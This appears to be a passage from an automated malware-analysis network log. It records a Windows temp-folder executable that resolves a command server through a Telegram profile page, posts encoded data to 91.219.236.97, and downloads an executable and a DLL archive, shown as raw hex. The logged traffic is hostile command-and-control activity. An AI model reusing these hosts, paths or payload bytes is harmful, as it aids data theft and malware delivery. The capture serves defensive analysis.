30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 37 61 63 38 61 71 38 39 65 6e 44 70 48 45 46 4f 49 52 75 4b 31 57 30 76 31 73 46 30 71 43 36 2f 34 62 62 2d 76 31 36 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 20 70 72 6f Data Ascii: 11f0<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta property="og:image" content="https://telegram.org/img/t_logo.png"><meta property="og:site_name" content="Telegram"><meta property="og:description" content="7ac8aq89enDpHEFOIRuK1W0v1sF0qC6/4bb-v16"><meta property="twitter:title" content="agrybirdsgamerept"><meta pro
Oct 29, 2021 20:50:39.733989000 CEST	16056	IN	Data Raw: 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 Data Ascii: perty="twitter:image" content="https://telegram.org/img/t_logo.png"><meta property="twitter:site" content="@Telegram"><meta property="al:ios:app_store_id" content="686449807"><meta property="al:ios:app_name" content="Telegram Messenger"><
Oct 29, 2021 20:50:39.734018087 CEST	16058	IN	Data Raw: 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 36 38 36 34 34 39 38 30 37 2c 20 61 70 70 2d 61 72 67 75 6d 65 6e 74 3a 20 74 67 3a 2f 2f 72 65 Data Ascii: "><meta name="apple-itunes-app" content="app-id=686449807, app-argument: tg://resolve?domain=agrybirdsgamerept"> <link rel="shortcut icon" href="//telegram.org/favicon.ico?3" type="image/x-icon" /> <link href="https://fonts.googleapi
Oct 29, 2021 20:50:39.734042883 CEST	16059	IN	Data Raw: 6f 6e 5f 62 75 74 74 6f 6e 5f 6e 65 77 22 20 68 72 65 66 3d 22 74 67 3a 2f 2f 72 65 73 6f 6c 76 65 3f 64 6f 6d 61 69 6e 3d 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 56 69 65 77 20 69 6e 20 54 65 6c 65 67 72 61 6d 3c 2f 61 3e 0a 3c Data Ascii: on_button_new" href="tg://resolve?domain=agrybirdsgamerept">View in Telegram</a></div>... WEBOGRAM_BTN --><div class="tgme_page_action tgme_page_context_action"><div class="tgme_page_context_btn"><a class="tgme_action_button_new" href="/s/
Oct 29, 2021 20:50:39.734061956 CEST	16059	IN	Data Raw: 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 38 2e 39 6d 73 20 2d 2d 3e 0a 0d 0a Data Ascii: </body></html>... page generated in 8.9ms -->
Oct 29, 2021 20:50:39.734080076 CEST	16059	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.4	49865	91.219.236.97	80	C:\Users\user\AppData\Local\Temp\5483.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:50:39.811393976 CEST	16060	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 91.219.236.97
Oct 29, 2021 20:50:39.811574936 CEST	16060	OUT	Data Raw: 6e 41 59 37 32 32 71 4d 51 4d 55 58 62 46 4a 4d 7a 43 6e 6a 6a 4c 37 78 5a 57 35 52 37 30 42 44 35 69 58 48 57 65 77 34 30 6f 71 6e 6f 75 4b 41 51 37 2f 63 66 62 37 6b 31 47 52 54 79 5a 50 42 2b 76 41 6f 58 78 6a 54 58 59 32 4f 57 37 70 6c 49 58 Data Ascii: nAY722qMQMUXbFJMzCnjjL7xZW5R70BD5iXHWew40oqnouKAQ7/cfb7k1GRTyZPB+vAoXxjTXY2OW7plIXdXFKvxQcko2SiT5+M59VGeFNkiVdQ3YicEPV0Nfns6Jw==
Oct 29, 2021 20:50:40.204830885 CEST	16061	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Oct 2021 18:50:40 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 32 34 61 38 0d 0a 68 52 6b 67 67 6a 6a 72 50 74 46 4e 4b 55 38 6a 6a 54 65 69 34 37 6e 51 44 42 35 4c 68 51 55 4d 39 55 36 66 4c 76 63 74 74 74 36 55 74 65 2f 67 56 5a 4b 73 63 66 37 6a 77 53 63 73 30 2f 61 41 67 4b 5a 2b 61 78 37 52 50 4d 37 4d 62 63 74 71 57 47 46 59 51 71 58 7a 53 4d 6b 71 69 53 43 64 74 62 46 74 38 56 4b 61 51 34 78 79 44 74 5a 6a 4e 53 4e 53 4c 31 6f 47 63 57 6c 6e 65 50 56 78 67 31 4d 78 6b 4c 45 57 6d 32 68 66 31 47 73 77 42 4b 2b 6e 75 66 77 49 32 31 34 79 45 57 75 55 62 42 37 76 74 58 4f 54 4d 69 61 7a 6f 52 71 61 4c 76 41 55 73 33 49 54 46 30 6f 61 51 30 42 42 71 34 4a 7a 7a 74 78 4b 31 62 34 56 38 70 44 72 62 6c 6e 75 6c 34 53 36 6a 6d 43 2b 62 70 59 41 34 41 30 49 6f 51 41 4b 30 4e 4a 6c 46 52 66 62 38 39 36 48 33 54 69 56 61 37 41 2b 4d 32 37 76 77 64 78 4c 59 47 5a 2f 31 43 62 6a 54 65 59 4d 66 56 53 6c 43 58 30 4f 2f 4a 4c 59 64 57 63 66 44 75 50 4d 38 6d 41 76 75 32 46 70 48 2f 46 78 36 66 5a 36 32 50 7a 62 57 6a 6e 5a 47 72 39 2b 69 77 33 64 34 62 46 2f 67 6d 77 74 6c 4b 4a 64 30 50 59 75 38 6e 45 47 45 2b 73 31 36 46 33 4d 2f 35 72 6c 65 53 44 70 61 6d 62 43 38 44 77 58 37 47 43 37 71 65 37 5a 47 65 33 71 67 58 38 34 46 42 6e 77 39 41 34 59 79 51 6a 65 4f 48 53 6c 70 4c 4d 39 6a 4c 6f 75 73 6e 33 70 34 6a 7a 74 4c 35 46 41 38 79 66 73 6e 76 6e 52 79 4d 6a 34 4d 42 6a 50 6d 79 77 42 64 5a 38 6d 57 59 34 46 54 50 66 45 33 61 6b 31 74 61 61 79 61 33 38 37 78 74 58 51 4c 33 38 2f 4e 4d 35 4b 55 73 2f 59 68 64 79 32 4e 4d 53 33 4f 4d 55 74 4a 59 68 35 61 43 70 34 59 37 33 6e 30 54 44 4d 7a 79 6c 56 54 66 79 30 63 58 59 77 4b 46 74 7a 74 2b 2b 67 74 51 2b 45 2f 4a 33 57 6f 49 70 30 62 6f 4f 79 77 79 6a 48 6c 6a 54 49 4d 71 63 63 68 30 56 4b 56 62 73 4c 73 50 77 30 46 69 53 66 37 2f 62 2f 42 72 39 68 53 5a 68 35 6d 5a 44 52 6d 70 33 34 2f 33 47 76 77 39 61 42 71 6f 72 65 65 44 32 30 51 33 75 42 53 5a 33 44 32 70 36 39 4e 52 78 49 50 32 73 67 65 39 70 70 4e 63 52 5a 43 42 33 44 56 79 41 72 73 43 47 30 6c 4e 52 4d 31 65 66 61 75 58 2f 73 79 61 2f 63 70 63 7a 54 70 77 71 4a 30 34 4f 5a 59 47 30 77 69 75 6f 4f 51 42 52 71 53 30 55 62 74 78 37 38 2b 4d 42 6f 49 63 79 41 47 55 45 57 31 41 61 5a 6f 65 76 45 4b 67 38 68 4d 55 57 6b 4f 54 52 2b 32 55 41 74 6c 46 37 4d 4a 2f 2f 6b 38 48 67 6c 74 70 4b 4c 79 76 68 63 4d 32 6d 5a 2f 51 54 4d 53 58 58 38 65 74 59 79 56 41 4b 72 2b 48 69 65 41 30 6a 77 6e 66 51 30 73 6f 38 6d 41 74 55 4d 74 72 6b 68 6d 4d 4e 76 6d 6c 47 76 64 77 43 5a 31 6d 62 34 50 41 70 53 38 42 50 61 44 68 39 75 63 38 4f 41 6e 59 49 48 71 30 35 42 72 64 33 38 44 70 4d 79 47 46 33 4a 37 64 4b 76 56 56 78 63 39 6b 47 63 2b 4d 31 68 74 56 78 36 51 56 7a 6d 69 77 65 58 4e 58 50 30 77 53 46 77 2b 34 36 79 69 30 33 36 30 62 6a 71 49 73 30 64 4b 39 49 4e 7a 6d 4f 73 41 5a 47 77 38 33 67 44 43 53 33 41 42 62 32 6e 53 65 42 4a 71 4c 41 43 73 68 41 36 73 4b 2f 79 46 32 56 44 6b 6a 42 75 57 49 30 6a 4e 67 32 75 33 4d 39 57 6a 53 73 46 39 4b 71 2b 6b 69 79 66 2b 5a 47 5a 4f 52 56 43 6d 46 4c 75 55 76 64 6a 78 46 46 34 48 58 55 42 6f 51 71 6f 6f 31 39 6a 78 31 51 4e 6f 56 37 74 74 76 72 57 5a 52 66 4e 54 39 4d 74 4e 56 52 41 63 47 68 5a 46 79 31 6a 7a 7a 2f 4b 48 79 42 58 77 63 55 35 37 6a 34 4c 6d 65 35 51 63 6e 30 74 31 66 63 49 30 59 34 2b 59 4f 4b 6a 56 31 47 59 30 67 50 73 35 67 6e 4b 74 61 30 72 6d 6f 54 61 71 57 69 34 34 44 77 43 77 42 6a 4a 63 33 52 69 46 78 30 41 68 52 Data Ascii: 24a8hRkggjjrPtFNKU8jjTei47nQDB5LhQUM9U6fLvcttt6Ute/gVZKscf7jwScs0/aAgKZ+ax7RPM7MbctqWGFYQqXzSMkqiSCdtbFt8VKaQ4xyDtZjNSNSL1oGcWlnePVxg1MxkLEWm2hf1GswBK+nufwI214yEWuUbB7vtXOTMiazoRqaLvAUs3ITF0oaQ0BBq4JzztxK1b4V8pDrblnul4S6jmC+bpYA4A0IoQAK0NJlFRfb896H3TiVa7A+M27vwdxLYGZ/1CbjTeYMfVSlCX0O/JLYdWcfDuPM8mAvu2FpH/Fx6fZ62PzbWjnZGr9+iw3d4bF/gmwtlKJd0PYu8nEGE+s16F3M/5rleSDpambC8DwX7GC7qe7ZGe3qgX84FBnw9A4YyQjeOHSlpLM9jLousn3p4jztL5FA8yfsnvnRyMj4MBjPmywBdZ8mWY4FTPfE3ak1taaya387xtXQL38/NM5KUs/Yhdy2NMS3OMUtJYh5aCp4Y73n0TDMzylVTfy0cXYwKFtzt++gtQ+E/J3WoIp0boOywyjHljTIMqcch0VKVbsLsPw0FiSf7/b/Br9hSZh5mZDRmp34/3Gvw9aBqoreeD20Q3uBSZ3D2p69NRxIP2sge9ppNcRZCB3DVyArsCG0lNRM1efauX/sya/cpczTpwqJ04OZYG0wiuoOQBRqS0Ubtx78+MBoIcyAGUEW1AaZoevEKg8hMUWkOTR+2UAtlF7MJ//k8HgltpKLyvhcM2mZ/QTMSXX8etYyVAKr+HieA0jwnfQ0so8mAtUMtrkhmMNvmlGvdwCZ1mb4PApS8BPaDh9uc8OAnYIHq05Brd38DpMyGF3J7dKvVVxc9kGc+M1htVx6QVzmiweXNXP0wSFw+46yi0360bjqIs0dK9INzmOsAZGw83gDCS3ABb2nSeBJqLACshA6sK/yF2VDkjBuWI0jNg2u3M9WjSsF9Kq+kiyf+ZGZORVCmFLuUvdjxFF4HXUBoQqoo19jx1QNoV7ttvrWZRfNT9MtNVRAcGhZFy1jzz/KHyBXwcU57j4Lme5Qcn0t1fcI0Y4+YOKjV1GY0gPs5gnKta0rmoTaqWi44DwCwBjJc3RiFx0AhR
Oct 29, 2021 20:50:40.204909086 CEST	16063	IN	Data Raw: 47 2f 31 4a 47 56 6c 44 75 41 6b 5a 4f 63 4b 76 67 37 64 63 35 52 59 70 4d 4d 4b 6d 59 37 4b 70 2b 70 64 75 50 63 55 68 59 4c 43 2b 72 36 36 38 36 63 38 59 53 41 32 70 46 44 74 4c 73 43 7a 49 55 68 35 66 52 47 5a 6e 6b 48 79 59 46 39 6f 59 52 68 Data Ascii: G/1JGVlDuAkZOcKvg7dc5RYpMMKmY7Kp+pduPcUhYLC+r6686c8YSA2pFDtLsCzIUh5fRGZnkHyYF9oYRhYhbKvDvCW67aZokOR5JtuWACQUr8xs9q1e3Bj1G02t4JM3IQAg4yxxV0qIyvXwm+nGK2/DlBCD6uvUs4a6fwx/eTLZmNX+XdadcnGe958Wpx/Bj92JgNpjR0zTP7rW/z+1xuGX+EZunYJG/TX1l1JqheL3kcxSRkL
Oct 29, 2021 20:50:40.204946995 CEST	16064	IN	Data Raw: 47 71 41 33 78 78 33 76 73 6d 6b 64 36 56 4c 76 64 56 72 52 53 68 4f 39 59 61 74 65 2b 6e 4d 75 44 51 56 44 42 5a 7a 5a 4a 47 6f 43 6e 76 51 44 39 51 2b 53 4b 58 47 44 32 78 47 6b 52 4b 64 7a 38 36 41 79 73 7a 70 58 30 62 38 4b 52 31 62 6a 56 65 Data Ascii: GqA3xx3vsmkd6VLvdVrRShO9Yate+nMuDQVDBZzZJGoCnvQD9Q+SKXGD2xGkRKdz86AyszpX0b8KR1bjVeqnUsfJnV6JNlUpMAfLy1j191eVh4GQsjdqHoZn8aCJt7Xa3koRCB9pHJhpvUAQzoir0/TyGHEVfRGVj3aWMWNQoBobcefMO1IOT/pgnyKaAopGUOQZhEtVovuCMwBfyCkCjecOVy9SKIFBfvJJJKSsi/alRcFMegk
Oct 29, 2021 20:50:40.204987049 CEST	16065	IN	Data Raw: 6d 36 64 2f 70 47 55 2b 31 31 52 35 34 34 41 43 35 62 5a 74 36 59 42 4d 52 30 43 31 36 76 6e 61 4d 68 45 57 6f 7a 57 5a 51 72 71 37 46 7a 4e 74 32 72 6c 42 53 59 70 38 4e 48 4c 66 4d 37 50 43 6c 47 71 52 58 55 47 31 66 54 30 33 62 59 5a 53 79 65 Data Ascii: m6d/pGU+11R544AC5bZt6YBMR0C16vnaMhEWozWZQrq7FzNt2rlBSYp8NHLfM7PClGqRXUG1fT03bYZSyegS3GgqJhdV9zp2CPUXShl3z7fO2JdGgXNLRMXRh/Nfiv6ILEv+XsGaEW5ps0VRhmxSJ/VEKZJIbFfWmCmK99zDsGgLdct3AvAkTCAp4GVrsbHlav1VvlypD/V06pCPYUcUsxczv+WNEZ7wI41H98ATWDIIIOVXfec
Oct 29, 2021 20:50:40.205027103 CEST	16067	IN	Data Raw: 51 75 33 4f 37 70 36 36 65 51 53 35 2b 4c 34 5a 6f 31 37 35 39 45 4c 65 68 5a 56 76 6d 71 77 61 30 4b 73 79 58 6c 59 76 42 42 43 51 35 72 45 48 68 52 7a 4e 51 61 4d 35 52 6e 58 2b 52 66 39 41 30 6b 52 6f 55 61 30 44 66 35 55 56 76 54 62 35 4c 71 Data Ascii: Qu3O7p66eQS5+L4Zo1759ELehZVvmqwa0KsyXlYvBBCQ5rEHhRzNQaM5RnX+Rf9A0kRoUa0Df5UVvTb5Lqbd2rcCnbCNM9i8Q3QwFUq2gGEndWC8ph7Ctr/00FZuh0cceq7enT+xsOkAeZ+QiM815p8F7XTBqfHXJjN7zq/MSCAZcU7dQCxKHskFy49Vv9YBqEFGKq2NROJKca86VjTu3NX5D/NzPYbR8SjpcdiypatmYjfGoli
Oct 29, 2021 20:50:40.205064058 CEST	16068	IN	Data Raw: 63 37 4d 34 33 53 6d 44 4e 57 4e 54 46 69 65 35 4c 33 7a 5a 53 6c 75 45 44 66 5a 53 34 4f 41 4a 33 6f 2f 57 63 52 6c 47 4b 54 59 38 44 4b 54 5a 45 50 30 70 43 6d 77 70 67 61 65 6e 30 43 37 32 56 52 48 32 43 5a 76 52 53 68 32 35 76 59 6d 58 39 58 Data Ascii: c7M43SmDNWNTFie5L3zZSluEDfZS4OAJ3o/WcRlGKTY8DKTZEP0pCmwpgaen0C72VRH2CZvRSh25vYmX9X+VCJVJFaMc0R4+ydp6hYmqfPc90hAR0996C1mN7S8XHGQUUmQeV2hCa9UqrM0PgafYRDLJZs1TSq1Ev7Zvs+ntgIbyalDOXghGrVwcoC3WKEHtCZhOQLc/Dcm18BDeJJkL6TcYDIPxFNabcBmeS4vuhbiIw3CAL9r
Oct 29, 2021 20:50:40.205096006 CEST	16070	IN	Data Raw: 70 2f 72 34 6c 39 59 4c 51 30 6f 2b 4c 68 39 31 77 4f 46 59 41 63 77 62 56 79 6d 46 64 57 54 72 30 71 66 33 2b 41 41 69 44 78 63 50 56 48 34 4b 72 6e 5a 66 70 61 41 46 34 32 61 53 51 72 54 36 75 55 45 70 45 4d 32 37 65 6c 33 50 44 6a 57 48 4c 5a Data Ascii: p/r4l9YLQ0o+Lh91wOFYAcwbVymFdWTr0qf3+AAiDxcPVH4KrnZfpaAF42aSQrT6uUEpEM27el3PDjWHLZpNvtH1NXtz4w45NwTzk/pn0BrEbDGr+ASz/CTx9cs49eMYaeeaX/xQTL4uHFI2Ua5AakHDFJjzxENjFd8LLiwfhqL6OB4/Ee9lb37+V0xDwn+h/AkKpL5FHObiCWY59J3/m4r70GvGpVHWFHKJlNVCVf3dudLFwMt
Oct 29, 2021 20:50:40.205117941 CEST	16070	IN	Data Raw: 4f 37 68 55 78 74 6d 5a 4e 4a 37 36 4a 49 56 47 75 76 30 78 47 79 70 65 4a 4f 73 67 4d 56 42 70 68 36 6e 6c 35 75 54 39 66 42 6f 4a 49 72 78 65 75 33 61 34 59 54 59 46 38 4e 63 34 69 71 71 4d 58 70 6c 6f 4e 5a 4b 43 6a 65 50 56 77 4e 54 71 37 72 Data Ascii: O7hUxtmZNJ76JIVGuv0xGypeJOsgMVBph6nl5uT9fBoJIrxeu3a4YTYF8Nc4iqqMXploNZKCjePVwNTq7rYfp+4KPrrYIrHzkmvFsE/rk9shnO8ENkXEXLYky+T+bau946T4PDMLiS1lrYbFgJ9qhe/but45vio3uA+13SN1diqrMhg8HNi4o/YixzAXA97f20cX7EXzI8XtHJzuo5hZBRQUTNrsBG1JYqajhUgVSOKDxSsQ==
Oct 29, 2021 20:50:40.283876896 CEST	16070	OUT	GET //l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 91.219.236.97
Oct 29, 2021 20:50:40.525811911 CEST	16072	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Oct 2021 18:50:40 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Oct 29, 2021 20:50:40.525849104 CEST	16073	IN	Data Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Oct 29, 2021 20:50:40.525870085 CEST	16074	IN	Data Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc Data Ascii: BZ\|$D$4$!\|$D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
Oct 29, 2021 20:50:40.525893927 CEST	16076	IN	Data Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 80 f9 5b b1 5d 0f 44 d1 b9 01 00 Data Ascii: $1U1E]E]EEEtM`ay?U[]DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1
Oct 29, 2021 20:51:01.203417063 CEST	22329	OUT	GET //l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 91.219.236.97
Oct 29, 2021 20:51:02.419167995 CEST	22334	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 29 Oct 2021 18:51:02 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 